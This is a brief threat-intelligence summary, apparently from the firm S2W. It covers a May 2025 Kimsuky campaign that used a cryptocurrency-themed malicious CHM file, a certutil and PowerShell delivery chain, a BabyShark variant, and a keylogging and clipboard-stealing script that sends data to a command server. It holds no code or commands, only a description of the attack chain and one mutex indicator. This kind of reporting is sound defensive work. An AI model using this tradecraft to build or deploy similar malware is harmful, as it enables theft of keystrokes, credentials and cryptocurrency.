S2W attributes a May 2025 cryptocurrency-themed malware campaign to North Korea-backed Kimsuky, centered on a malicious Windows CHM help file named wallet.chm. Opening the CHM and triggering the embedded content leads through JavaScript, ActiveX shortcut creation, certutil decoding, wscript.exe execution, and PowerShell downloads from C2 infrastructure hosted on a compromised domestic electronics manufacturing and repair company server. The follow-on payload is identified as a BabyShark variant that collects host details, directory and file listings, process and antivirus information, and can retrieve additional payloads. A separate PowerShell monitoring script captures clipboard contents and keystrokes, uses the mutex Global\AlreadyRunning19122345 to avoid duplicate execution, and periodically exfiltrates stolen data to the C2 server. The activity shows Kimsuky continuing to adapt familiar CHM and BabyShark tradecraft with cryptocurrency lures and shifted delivery infrastructure.